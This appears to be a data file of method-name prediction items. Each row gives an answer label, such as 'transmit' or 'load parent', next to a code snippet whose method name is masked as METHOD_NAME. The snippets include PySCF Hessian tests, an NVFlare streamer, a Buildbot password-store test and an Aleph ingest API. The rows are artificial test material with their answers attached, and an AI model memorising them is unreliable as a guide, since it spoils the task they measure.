deposit = create_deposit(owner, 'test', experiment='CMS', publish=True)
metadata = deposit.get_record_metadata()
depid = deposit['_deposit']['id']
resp = client.post('/deposits/{}/actions/edit'.format(depid),
headers=auth_headers_for_superuser)
assert resp.status_code == 201
assert resp.json == {
'id': depid,
'recid': deposit['control_number'],
'type': 'deposit',
'revision': 2,
'schema': {
'fullname': '',
'name': 'test',
'version': '1.0.0'
},
'experiment': 'CMS',
'status': 'draft',
'created_by': {'email': owner.email, 'profile': {}},
'created': metadata.created.strftime('%Y-%m-%dT%H:%M:%S.%f+00:00'),
'updated': metadata.updated.strftime('%Y-%m-%dT%H:%M:%S.%f+00:00'),
'metadata': {},
'labels': [],
'files': [],
'access': {
'deposit-admin': {
'roles': [],
'users': [{'email': owner.email, 'profile': {}}]
},
'deposit-update': {
'roles': [],
'users': [{'email': owner.email, 'profile': {}}]
},
'deposit-read': {
'roles': [],
'users': [{'email': owner.email, 'profile': {}}]
}
},
'is_owner': False,
'links': {
'bucket': 'http://analysispreservation.cern.ch/api/files/{}'.
format(deposit.files.bucket),
'clone': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/clone'
.format(depid),
'discard': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/discard'
.format(depid),
'disconnect_webhook': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/disconnect_webhook'
.format(depid),
'edit': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/edit'
.format(depid),
'files': 'http://analysispreservation.cern.ch/api/deposits/{}/files'
.format(depid),
'html': 'http://analysispreservation.cern.ch/drafts/{}'.format(
depid),
'permissions': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/permissions'
.format(depid),
'publish': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/publish'
.format(depid),
'self': 'http://analysispreservation.cern.ch/api/deposits/{}'.
format(depid),
'upload': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/upload'
.format(depid)
}
} | null |
test finite diff lda partial hess high | #!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy
from pyscf import gto, dft, lib
from pyscf import grad, hessian
def setUpModule():
global mol
mol = gto.Mole()
mol.verbose = 5
mol.output = '/dev/null'
mol.atom.extend([
["O" , (0. , 0. , 0.)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)] ])
mol.basis = '6-31g'
mol.charge = 1
mol.spin = 1
mol.build()
h4 = gto.Mole()
h4.verbose = 0
h4.atom = [
[1 , (1. , 0. , 0.000)],
[1 , (0. , 1. , 0.000)],
[1 , (0. , -1.517 , 1.177)],
[1 , (0. , 1.517 , 1.177)]]
h4.basis = '631g'
h4.spin = 2
h4.unit = 'B'
h4.build()
def tearDownModule():
global mol, h4
mol.stdout.close()
del mol, h4
def finite_diff(mf):
mol = mf.mol
mfs = mf.Gradients().set(grid_response=True).as_scanner()
def grad_full(ia, inc):
coord = mol.atom_coord(ia).copy()
ptr = mol._atm[ia,gto.PTR_COORD]
de = []
for i in range(3):
mol._env[ptr+i] = coord[i] + inc
e1a = mfs(mol.copy())[1]
mol._env[ptr+i] = coord[i] - inc
e1b = mfs(mol.copy())[1]
mol._env[ptr+i] = coord[i]
de.append((e1a-e1b)/(2*inc))
return de
natm = mol.natm
e2ref = [grad_full(ia, .5e-3) for ia in range(mol.natm)]
e2ref = numpy.asarray(e2ref).reshape(natm,3,natm,3).transpose(0,2,1,3)
return e2ref
def finite_partial_diff(mf):
# \partial^2 E / \partial R \partial R'
mol = mf.mol
def grad_partial_R(ia, inc):
coord = mol.atom_coord(ia).copy()
ptr = mol._atm[ia,gto.PTR_COORD]
de = []
for i in range(3):
mol._env[ptr+i] = coord[i] + inc
e1a = mf.nuc_grad_method().kernel()
mol._env[ptr+i] = coord[i] - inc
e1b = mf.nuc_grad_method().kernel()
mol._env[ptr+i] = coord[i]
de.append((e1a-e1b)/(2*inc))
return de
natm = mol.natm
e2ref = [grad_partial_R(ia, .5e-3) for ia in range(mol.natm)]
e2ref = numpy.asarray(e2ref).reshape(natm,3,natm,3).transpose(0,2,1,3)
return e2ref
class KnownValues(unittest.TestCase):
def test_finite_diff_lda_hess(self):
mf = dft.UKS(mol)
mf.conv_tol = 1e-14
e0 = mf.kernel()
hess = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(hess), -0.8503072107510495, 6)
g_scanner = mf.nuc_grad_method().as_scanner()
pmol = mol.copy()
e1 = g_scanner(pmol.set_geom_('O 0. 0. 0.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
e2 = g_scanner(pmol.set_geom_('O 0. 0. -.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
#FIXME: errors seems too big
self.assertAlmostEqual(abs(hess[0,:,2] - (e1-e2)/2e-4*lib.param.BOHR).max(), 0, 3)
def test_finite_diff_b3lyp_hess(self):
mf = dft.UKS(mol)
mf.conv_tol = 1e-14
mf.xc = 'b3lyp5'
e0 = mf.kernel()
hess = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(hess), -0.8208641727673912, 6)
g_scanner = mf.nuc_grad_method().as_scanner()
pmol = mol.copy()
e1 = g_scanner(pmol.set_geom_('O 0. 0. 0.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
e2 = g_scanner(pmol.set_geom_('O 0. 0. -.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
#FIXME: errors seems too big
self.assertAlmostEqual(abs(hess[0,:,2] - (e1-e2)/2e-4*lib.param.BOHR).max(), 0, 3)
def test_finite_diff_wb97x_hess(self):
mf = dft.UKS(mol)
mf.conv_tol = 1e-14
mf.xc = 'wb97x'
e0 = mf.kernel()
hess = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(hess), -0.8207572641132195, 6)
g_scanner = mf.nuc_grad_method().as_scanner()
pmol = mol.copy()
e1 = g_scanner(pmol.set_geom_('O 0. 0. 0.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
e2 = g_scanner(pmol.set_geom_('O 0. 0. -.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
#FIXME: errors seems too big
self.assertAlmostEqual(abs(hess[0,:,2] - (e1-e2)/2e-4*lib.param.BOHR).max(), 0, 2)
def test_finite_diff_m06l_hess(self):
mf = dft.UKS(mol)
mf.conv_tol = 1e-14
mf.xc = 'm06l'
# Note MGGA hessian is sensitive to grids level
mf.grids.level = 4
e0 = mf.kernel()
hess = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(hess), -0.8108006455574677, 6)
g_scanner = mf.nuc_grad_method().as_scanner()
pmol = mol.copy()
e1 = g_scanner(pmol.set_geom_('O 0. 0. 0.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
e2 = g_scanner(pmol.set_geom_('O 0. 0. -.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
#FIXME: errors seems too big
self.assertAlmostEqual(abs(hess[0,:,2] - (e1-e2)/2e-4*lib.param.BOHR).max(), 0, 1)
def test_finite_diff_lda_hess_high_cost(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'lda,vwn'
mf.conv_tol = 1e-14
mf.kernel()
e2 = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(e2), -0.058957876613586674, 3)
e2ref = finite_diff(mf)
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 4)
def test_finite_diff_b3lyp_hess_high_cost(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'b3lyp5'
mf.conv_tol = 1e-14
mf.kernel()
e2 = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(e2), -0.12571388626848667, 4)
e2ref = finite_diff(mf)
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 4)
def test_finite_diff_m06l_hess_high_cost(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'm06l'
mf.conv_tol = 1e-14
mf.kernel()
e2 = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(e2), -0.1846235372107723, 3)
e2ref = finite_diff(mf)
#FIXME: errors seems too big
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 2)
def METHOD_NAME(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'lda,vwn'
mf.conv_tol = 1e-14
mf.kernel()
hobj = mf.Hessian()
e2 = hobj.partial_hess_elec(mf.mo_energy, mf.mo_coeff, mf.mo_occ)
e2 += hobj.hess_nuc(h4)
e2ref = finite_partial_diff(mf)
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 6)
def test_finite_diff_b3lyp_partial_hess_high_cost(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'b3lyp'
mf.conv_tol = 1e-14
mf.kernel()
hobj = mf.Hessian()
e2 = hobj.partial_hess_elec(mf.mo_energy, mf.mo_coeff, mf.mo_occ)
e2 += hobj.hess_nuc(h4)
e2ref = finite_partial_diff(mf)
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 6)
def test_finite_diff_m06l_partial_hess_high_cost(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'm06l'
mf.conv_tol = 1e-14
mf.kernel()
hobj = mf.Hessian()
e2 = hobj.partial_hess_elec(mf.mo_energy, mf.mo_coeff, mf.mo_occ)
e2 += hobj.hess_nuc(h4)
e2ref = finite_partial_diff(mf)
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 6)
if __name__ == "__main__":
print("Full Tests for UKS Hessian")
unittest.main() | null |
std weekend response | import logging
import random
import sentry_sdk
from os import getenv
from typing import Tuple
import common.dff.integration.condition as int_cnd
import common.dff.integration.context as int_ctx
import common.greeting as common_greeting
import common.scenarios.weekend as common_weekend
from common.constants import CAN_CONTINUE_SCENARIO
from df_engine.core import Actor, Context
sentry_sdk.init(getenv("SENTRY_DSN"))
logger = logging.getLogger(__name__)
LANGUAGE = getenv("LANGUAGE", "EN")
REPLY_TYPE = Tuple[str, float, dict, dict, dict]
DIALOG_BEGINNING_START_CONFIDENCE = 0.98
DIALOG_BEGINNING_CONTINUE_CONFIDENCE = 0.9
DIALOG_BEGINNING_SHORT_ANSWER_CONFIDENCE = 0.98
MIDDLE_DIALOG_START_CONFIDENCE = 0.7
SUPER_CONFIDENCE = 0.98
HIGH_CONFIDENCE = 0.95
MIDDLE_CONFIDENCE = 0.92
GREETING_STEPS = list(common_greeting.GREETING_QUESTIONS[LANGUAGE])
def METHOD_NAME(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.WEEKEND_QUESTIONS)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_START_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_cleaned_up_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.CLEANED_UP_STATEMENTS)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_slept_in_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.SLEPT_IN_QUESTIONS)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_START_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_feel_great_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.WHAT_PLANS_FOR_TODAY)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_need_more_time_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.WISH_MORE_TIME)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_watched_film_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.MOVIE_NAME_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_read_book_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.BOOK_NAME_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_played_computer_game_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.COMPUTER_GAME_NAME_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_play_on_weekends_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.GAME_EMOTIONS_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_play_regularly_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.REGULAR_PLAYER_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_play_once_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.OCCASIONAL_PLAYER_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body]) | null |
transmit | # Copyright (c) 2023, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
from typing import Optional
from nvflare.fuel.f3.cellnet.core_cell import CoreCell
from nvflare.fuel.f3.cellnet.defs import MessageHeaderKey
from nvflare.fuel.f3.message import Message
from nvflare.fuel.f3.streaming.stream_const import (
STREAM_ACK_TOPIC,
STREAM_CHANNEL,
STREAM_DATA_TOPIC,
StreamDataType,
StreamHeaderKey,
)
from nvflare.fuel.f3.streaming.stream_types import Stream, StreamError, StreamFuture
from nvflare.fuel.f3.streaming.stream_utils import gen_stream_id, stream_thread_pool, wrap_view
STREAM_CHUNK_SIZE = 1024 * 1024
STREAM_WINDOW_SIZE = 16 * STREAM_CHUNK_SIZE
STREAM_ACK_WAIT = 10
log = logging.getLogger(__name__)
class TxTask:
def __init__(self, channel: str, topic: str, target: str, headers: dict, stream: Stream):
self.sid = gen_stream_id()
self.buffer = bytearray(STREAM_CHUNK_SIZE)
# Optimization to send the original buffer without copying
self.direct_buf: Optional[bytes] = None
self.buffer_size = 0
self.channel = channel
self.topic = topic
self.target = target
self.headers = headers
self.stream = stream
self.stream_future = None
self.task_future = None
self.ack_waiter = threading.Event()
self.seq = 0
self.offset = 0
self.offset_ack = 0
def __str__(self):
return f"Tx[SID:{self.sid} to {self.target} for {self.channel}/{self.topic}]"
class ByteStreamer:
def __init__(self, cell: CoreCell):
self.cell = cell
self.cell.register_request_cb(channel=STREAM_CHANNEL, topic=STREAM_ACK_TOPIC, cb=self._ack_handler)
self.tx_task_map = {}
self.map_lock = threading.Lock()
@staticmethod
def get_chunk_size():
return STREAM_CHUNK_SIZE
def send(self, channel: str, topic: str, target: str, headers: dict, stream: Stream) -> StreamFuture:
tx_task = TxTask(channel, topic, target, headers, stream)
with self.map_lock:
self.tx_task_map[tx_task.sid] = tx_task
future = StreamFuture(tx_task.sid)
future.set_size(stream.get_size())
tx_task.stream_future = future
tx_task.task_future = stream_thread_pool.submit(self._transmit_task, tx_task)
return future
def _transmit_task(self, task: TxTask):
while True:
buf = task.stream.read(STREAM_CHUNK_SIZE)
if not buf:
# End of Stream
self.METHOD_NAME(task, final=True)
self._stop_task(task)
return
# Flow control
window = task.offset - task.offset_ack
# It may take several ACKs to clear up the window
while window > STREAM_WINDOW_SIZE:
log.debug(f"{task} window size {window} exceeds limit: {STREAM_WINDOW_SIZE}")
task.ack_waiter.clear()
if not task.ack_waiter.wait(timeout=STREAM_ACK_WAIT):
self._stop_task(task, StreamError(f"{task} ACK timeouts after {STREAM_ACK_WAIT} seconds"))
return
window = task.offset - task.offset_ack
size = len(buf)
if size > STREAM_CHUNK_SIZE:
raise StreamError(f"Stream returns invalid size: {size} for {task}")
if size + task.buffer_size > STREAM_CHUNK_SIZE:
self.METHOD_NAME(task)
if size == STREAM_CHUNK_SIZE:
task.direct_buf = buf
else:
task.buffer[task.buffer_size : task.buffer_size + size] = buf
task.buffer_size += size
def METHOD_NAME(self, task: TxTask, final=False):
if task.buffer_size == 0:
payload = None
elif task.buffer_size == STREAM_CHUNK_SIZE:
if task.direct_buf:
payload = task.direct_buf
else:
payload = task.buffer
else:
payload = wrap_view(task.buffer)[0 : task.buffer_size]
message = Message(None, payload)
if task.offset == 0:
# User headers are only included in the first chunk
if task.headers:
message.add_headers(task.headers)
message.add_headers(
{
StreamHeaderKey.CHANNEL: task.channel,
StreamHeaderKey.TOPIC: task.topic,
StreamHeaderKey.SIZE: task.stream.get_size(),
}
)
message.add_headers(
{
StreamHeaderKey.STREAM_ID: task.sid,
StreamHeaderKey.DATA_TYPE: StreamDataType.FINAL if final else StreamDataType.CHUNK,
StreamHeaderKey.SEQUENCE: task.seq,
StreamHeaderKey.OFFSET: task.offset,
}
)
errors = self.cell.fire_and_forget(STREAM_CHANNEL, STREAM_DATA_TOPIC, task.target, message)
error = errors.get(task.target)
if error:
msg = f"Message sending error to target {task.target}: {error}"
log.debug(msg)
self._stop_task(task, StreamError(msg))
return
# Update state
task.seq += 1
task.offset += task.buffer_size
task.buffer_size = 0
task.direct_buf = None
# Update future
task.stream_future.set_progress(task.offset)
def _stop_task(self, task: TxTask, error: StreamError = None, notify=True):
with self.map_lock:
self.tx_task_map.pop(task.sid, None)
if error:
log.debug(f"Stream error: {error}")
task.stream_future.set_exception(error)
if notify:
message = Message(None, None)
message.add_headers(
{
StreamHeaderKey.STREAM_ID: task.sid,
StreamHeaderKey.DATA_TYPE: StreamDataType.ERROR,
StreamHeaderKey.OFFSET: task.offset,
StreamHeaderKey.ERROR_MSG: str(error),
}
)
self.cell.fire_and_forget(STREAM_CHANNEL, STREAM_DATA_TOPIC, task.target, message)
else:
# Result is the number of bytes streamed
task.stream_future.set_result(task.offset)
def _ack_handler(self, message: Message):
origin = message.get_header(MessageHeaderKey.ORIGIN)
sid = message.get_header(StreamHeaderKey.STREAM_ID)
offset = message.get_header(StreamHeaderKey.OFFSET, None)
with self.map_lock:
task = self.tx_task_map.get(sid, None)
if not task:
# Last few ACKs always arrive late so this is normal
log.debug(f"ACK for stream {sid} received late from {origin} with offset {offset}")
return
error = message.get_header(StreamHeaderKey.ERROR_MSG, None)
if error:
self._stop_task(task, StreamError(f"Received error from {origin}: {error}"), notify=False)
return
if offset > task.offset_ack:
task.offset_ack = offset
if not task.ack_waiter.is_set():
task.ack_waiter.set() | null |
tear down | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from pathlib import Path
from unittest import mock
from twisted.internet import defer
from twisted.python.filepath import FilePath
from twisted.trial import unittest
from buildbot.secrets.providers.passwordstore import SecretInPass
from buildbot.test.fake import fakemaster
from buildbot.test.reactor import TestReactorMixin
from buildbot.test.runprocess import ExpectMasterShell
from buildbot.test.runprocess import MasterRunProcessMixin
from buildbot.test.util.config import ConfigErrorsMixin
class TestSecretInPass(MasterRunProcessMixin, TestReactorMixin, ConfigErrorsMixin,
unittest.TestCase):
@defer.inlineCallbacks
def setUp(self):
self.setup_test_reactor()
self.setup_master_run_process()
self.master = fakemaster.make_master(self)
with mock.patch.object(Path, "is_file", return_value=True):
self.tmp_dir = self.create_temp_dir("temp")
self.srvpass = SecretInPass("password", self.tmp_dir)
yield self.srvpass.setServiceParent(self.master)
yield self.master.startService()
@defer.inlineCallbacks
def METHOD_NAME(self):
yield self.srvpass.stopService()
def create_temp_dir(self, dirname):
tempdir = FilePath(self.mktemp())
tempdir.createDirectory()
return tempdir.path
def test_check_config_secret_in_pass_service(self):
self.assertEqual(self.srvpass.name, "SecretInPass")
env = self.srvpass._env
self.assertEquals(env["PASSWORD_STORE_GPG_OPTS"], "--passphrase password")
self.assertEquals(env["PASSWORD_STORE_DIR"], self.tmp_dir)
def test_check_config_binary_error_secret_in_pass_service(self):
expected_error_msg = "pass does not exist in PATH"
with mock.patch.object(Path, "is_file", return_value=False):
with self.assertRaisesConfigError(expected_error_msg):
self.srvpass.checkConfig("password", "temp")
def test_check_config_directory_error_secret_in_pass_service(self):
expected_error_msg = "directory temp2 does not exist"
with mock.patch.object(Path, "is_file", return_value=True):
with self.assertRaisesConfigError(expected_error_msg):
self.srvpass.checkConfig("password", "temp2")
@defer.inlineCallbacks
def test_reconfig_secret_in_a_file_service(self):
with mock.patch.object(Path, "is_file", return_value=True):
otherdir = self.create_temp_dir("temp2")
yield self.srvpass.reconfigService("password2", otherdir)
self.assertEqual(self.srvpass.name, "SecretInPass")
env = self.srvpass._env
self.assertEquals(env["PASSWORD_STORE_GPG_OPTS"], "--passphrase password2")
self.assertEquals(env["PASSWORD_STORE_DIR"], otherdir)
@defer.inlineCallbacks
def test_get_secret_in_pass(self):
self.expect_commands(
ExpectMasterShell(['pass', 'secret'])
.stdout(b'value')
)
value = yield self.srvpass.get("secret")
self.assertEqual(value, "value")
self.assert_all_commands_ran()
@defer.inlineCallbacks
def test_get_secret_in_pass_multiple_lines_unix(self):
self.expect_commands(
ExpectMasterShell(['pass', 'secret'])
.stdout(b"value1\nvalue2\nvalue3")
)
value = yield self.srvpass.get("secret")
self.assertEqual(value, "value1")
self.assert_all_commands_ran()
@defer.inlineCallbacks
def test_get_secret_in_pass_multiple_lines_darwin(self):
self.expect_commands(
ExpectMasterShell(['pass', 'secret'])
.stdout(b"value1\rvalue2\rvalue3")
)
value = yield self.srvpass.get("secret")
self.assertEqual(value, "value1")
self.assert_all_commands_ran()
@defer.inlineCallbacks
def test_get_secret_in_pass_multiple_lines_windows(self):
self.expect_commands(
ExpectMasterShell(['pass', 'secret'])
.stdout(b"value1\r\nvalue2\r\nvalue3")
)
value = yield self.srvpass.get("secret")
self.assertEqual(value, "value1")
self.assert_all_commands_ran()
@defer.inlineCallbacks
def test_get_secret_in_pass_not_found(self):
self.expect_commands(
ExpectMasterShell(['pass', 'secret'])
.stderr(b"Not found")
)
value = yield self.srvpass.get("secret")
self.assertEqual(value, None) | null |
load parent | import json
import shutil
import logging
from banal import ensure_dict
from flask import Blueprint, request
from tempfile import mkdtemp
from werkzeug.exceptions import BadRequest
from normality import safe_filename, stringify
from servicelayer.archive.util import ensure_path
from aleph.core import db, archive
from aleph.model import Document, Entity, Events
from aleph.queues import ingest_entity
from aleph.index.entities import index_proxy
from aleph.logic.documents import ingest_flush
from aleph.logic.notifications import publish, channel_tag
from aleph.views.util import get_db_collection, get_flag
from aleph.views.util import jsonify, validate, get_session_id
log = logging.getLogger(__name__)
blueprint = Blueprint("ingest_api", __name__)
def METHOD_NAME(collection, meta):
"""Determine the parent document for the document that is to be
ingested."""
parent = ensure_dict(meta.get("parent"))
parent_id = meta.get("parent_id", parent.get("id"))
if parent_id is None:
return
parent = Document.by_id(parent_id, collection=collection)
if parent is None:
raise BadRequest(
response=jsonify(
{"status": "error", "message": "Cannot load parent document"},
status=400,
)
)
return parent
def _load_metadata():
"""Unpack the common, pre-defined metadata for all the uploaded files."""
try:
meta = json.loads(request.form.get("meta", "{}"))
except Exception as ex:
raise BadRequest(str(ex))
validate(meta, "DocumentIngest")
foreign_id = stringify(meta.get("foreign_id"))
if not len(request.files) and foreign_id is None:
raise BadRequest(
response=jsonify(
{"status": "error", "message": "Directories need to have a foreign_id"},
status=400,
)
)
return meta, foreign_id
def _notify(collection, document_id):
if not collection.casefile:
return
channels = [
channel_tag(document_id, Entity),
channel_tag(collection),
]
params = {"collection": collection, "document": document_id}
publish(
Events.INGEST_DOCUMENT,
params=params,
channels=channels,
actor_id=request.authz.id,
)
@blueprint.route("/<int:collection_id>/ingest", methods=["POST", "PUT"])
def ingest_upload(collection_id):
"""
---
post:
summary: Upload a document to a collection
description: Upload a document to a collection with id `collection_id`
parameters:
- in: path
name: collection_id
required: true
schema:
type: integer
requestBody:
content:
multipart/form-data:
schema:
type: object
properties:
file:
type: string
format: binary
description: The document to upload
meta:
$ref: '#/components/schemas/DocumentIngest'
responses:
'200':
description: OK
content:
application/json:
schema:
properties:
id:
description: id of the uploaded document
type: integer
status:
type: string
type: object
tags:
- Ingest
- Collection
"""
collection = get_db_collection(collection_id, request.authz.WRITE)
job_id = get_session_id()
sync = get_flag("sync", default=False)
index = get_flag("index", default=True)
meta, foreign_id = _load_metadata()
parent = METHOD_NAME(collection, meta)
upload_dir = ensure_path(mkdtemp(prefix="aleph.upload."))
try:
content_hash = None
for storage in request.files.values():
path = safe_filename(storage.filename, default="upload")
path = upload_dir.joinpath(path)
storage.save(str(path))
content_hash = archive.archive_file(path)
document = Document.save(
collection=collection,
parent=parent,
foreign_id=foreign_id,
content_hash=content_hash,
meta=meta,
role_id=request.authz.id,
)
collection.touch()
db.session.commit()
proxy = document.to_proxy(ns=collection.ns)
if proxy.schema.is_a(Document.SCHEMA_FOLDER) and sync and index:
index_proxy(collection, proxy, sync=sync)
ingest_flush(collection, entity_id=proxy.id)
ingest_entity(collection, proxy, job_id=job_id, index=index)
_notify(collection, proxy.id)
return jsonify({"status": "ok", "id": proxy.id}, status=201)
finally:
shutil.rmtree(upload_dir) | null |
ctu mapping | # -------------------------------------------------------------------------
#
# Part of the CodeChecker project, under the Apache License v2.0 with
# LLVM Exceptions. See LICENSE for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
# -------------------------------------------------------------------------
